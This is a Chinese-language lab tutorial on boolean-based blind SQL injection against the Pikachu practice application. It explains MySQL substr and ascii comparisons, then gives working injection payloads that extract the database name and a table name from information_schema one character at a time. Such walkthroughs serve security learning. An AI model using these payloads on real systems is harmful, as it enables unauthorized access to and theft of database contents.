SQL注入-盲注基于boolian案例利用

首先总结一下sql语句中的函数意思

#查看当前所在的数据库
mysql> select database();
+------------+
| database() |
+------------+
| pikachu    |
+------------+
1 row in set (0.00 sec)#函数substr里1是从第几位开始取字符，2是取多少个字符
mysql> select substr(database(),1,2);
+------------------------+
| substr(database(),1,2) |
+------------------------+
| pi                     |
+------------------------+
1 row in set (0.00 sec)#函数ascii是将字符转换为数字，注释：p转换数字是112
mysql> select ascii(substr(database(),1,1));
+-------------------------------+
| ascii(substr(database(),1,1)) |
+-------------------------------+
|                           112 |
+-------------------------------+
1 row in set (0.00 sec)#做比较，显然112>113不成立，则为假，即：0
mysql> select ascii(substr(database(),1,1))>113;
+-----------------------------------+
| ascii(substr(database(),1,1))>113 |
+-----------------------------------+
|                                 0 |
+-----------------------------------+
1 row in set (0.00 sec)#做比较，显然112>111成立，则为真，即：1
mysql> select ascii(substr(database(),1,1))>111;
+-----------------------------------+
| ascii(substr(database(),1,1))>111 |
+-----------------------------------+
|                                 1 |
+-----------------------------------+
1 row in set (0.00 sec)mysql>

盲注boolian类型
输入的内容是否正确，返回的信息比较少，只有两种返回结果：正确或者是用户名不存在
输入kobe直接返回正确的信息，输入kobe’ and 1=1#也返回了正确的信息,证明and被后台执行了
注释：and符号表示：前后都为真则输出正确的信息

输入kobe’ and 1=2#,则显示用户不存在，意思就是前面为真，后面为假，则结果为假，如图所示：

通过上面的图例子，我们可以利用左右都为真，则判断数据库名称的字符,多次进行测试

kobe' and ascii(substr(database(),1,1))=112#

根据payload语句执行成功，则可以判断出数据库第一个字符ascii=112，转换成字符为p
注释：这个方法虽然满了一点，但是一点一点测试会把数据库信息都爆出来的

现在则继续测试第二个字符，我这里是多次测试得出来得结果105转换字符为：i

kobe' and ascii(substr(database(),2,1))=105#

如图所示：结果为真

table_name=database()等于table_name=‘pikachu’
同样也可以进行爆出该数据库下的表名的字符，数字为104转成字符为h

kobe' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104#

如图所示，执行成功

我这里就不依次进行测试了，查到的第一个字符为h